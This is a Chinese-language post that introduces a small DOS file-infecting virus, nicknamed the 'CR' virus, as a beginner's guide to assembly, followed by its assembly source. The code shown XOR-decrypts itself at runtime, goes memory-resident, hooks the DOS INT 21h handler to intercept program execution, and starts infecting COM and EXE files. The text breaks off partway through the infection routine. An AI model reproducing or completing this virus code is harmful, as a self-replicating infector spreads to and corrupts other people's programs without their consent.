这个病毒虽然比较简单。但是麻雀虽小,五脏俱全。隐藏,感染,加密等模块应有尽有(只是不会破坏),是一个比较标准的DOS病毒,可以感染.EXE(不包括PE)和.COM的可执行文件。
如果您希望学习汇编语言,用这个程序作为入门指导倒是比较合适的。
染毒文件会被打上“CR”的标记,我们姑且称它为CR病毒吧。
baseoff equ 107h
code segment
assume cs:code,ds:code,es:code,ss:code
org 100h
main:
mov ax,offset begin
jmp ax
db 'cr'
begin:
push es
push ds
mov ax,cs
mov ds,ax
mov es,ax
call get_ip
push ax
mov ax,offset encodebegin
jmp short get_ip_end
oldhead db 0h,4ch,0cdh,21h,6 dup (?)
get_ip label near
mov bp,sp
mov bx,[bp]
ret
get_ip_end:
sub bx,112h ;get current offset
add ax,bx
push ax
pop di
mov si,di
cld
mov cx, offset endtag-offset encodebegin
mov dl, byte ptr [oldhead+bx]
push si
decode:
lodsb
xor al,dl
stosb ;decode at runtime
loop decode
retf ;retf cs:ip=encodebegin
db 62h
db 65h
encodebegin:
mov ax,9f80h
mov es,ax
cmp es:word ptr [virustag-baseoff],7263h
jz alreadyresident
push ds
mov ax,40h
mov ds,ax
mov di,13h ;get free memory
sub word ptr [di],2
pop ds
mov di,0
mov si,bx
add si,baseoff
mov cx,2048
cld
rep movsb ;resident in memory
nop
push bx
mov ax,9f80h
mov ds,ax
mov ax,3521h
int 21h
mov ds:word ptr[oldint21-baseoff],bx
mov dx,bx
mov ds:word ptr[oldint21-baseoff+2h],es
mov dx,offset newint21proc-baseoff
mov ax,2521h
int 21h
mov dx,offset newint12proc-baseoff
mov ax,2512h
int 21h
pop bx
alreadyresident:
mov ax,cs
mov ds,ax
mov es,ax
mov si,offset oldhead
add si,bx
mov di,0100h
cmp cs:word ptr oldhead[bx],6163h ;this is an infected EXE file
jz GotoExe
cld
mov cx,7
rep movsb
pop ds
pop es
cmp cs:word ptr oldhead[bx],4c00h
jz go_out
GotoOldHead: ;this is an infected COM file
mov ax,0100h
jmp ax
GotoExe:
pop ds
pop es
mov ax,ds
add ax,cs:ini_ss[bx] ;set old ss
add ax,10h
mov ss,ax
mov ax,cs:ini_sp[bx] ;set old sp
mov sp,ax
mov ax,ds
add ax,10h
add cs:ini_cs[bx],ax ;set old cs
jmp cs:dword ptr ini_ip[bx] ;jump to the normal EXE
go_out:
mov ah,4ch
int 21h
oldint21 dw 2 dup(?)
filehead db 18h dup (?)
filesize dw 2 dup(?)
virustag db 'cr'
infecthead:
mov ax,offset begin
jmp ax
db 'cr'
temp dw ?
ini_ip dw ?
ini_cs dw ?
ini_ss dw ?
ini_sp dw ?
newint21proc:
cmp ah,4bh
jz tryinfect
jmp int21h
tryinfect:
push ax ;begin to infect
push cx
push es
push di
push bx
push dx
push ds
mov ax,3d02h
int 21h
jnc openok
jmp notinfect ;open fail? not infect
openok:
push ds
push dx
push cs
pop ds
mov dx,offset filehead-baseoff
mov bx,ax
mov cx,18h
mov ah,3fh
int 21h
pop dx
pop ds
jc closefilenear ;read fail? not infect
mov di,offset filehead-baseoff
mov ax,9f80h
mov es,ax
cmp word ptr es:[di],5a4dh ;'MZ' in head? EXE file...
jnz COM_infect
jmp EXE_infect
COM_infect:
cmp word ptr es:[di+5],7263h ;'cr' in 105h? not infect
jz closefilenear
call getfilesize
cmp dx,0
jnz closefilenear ; file is too big..not infect
cmp ax,63000
ja closefilenear ; file is too big..not infect
cmp ax,10
jb closefilenear ; file is too small..not infect
;infect begin,hahahahaha....
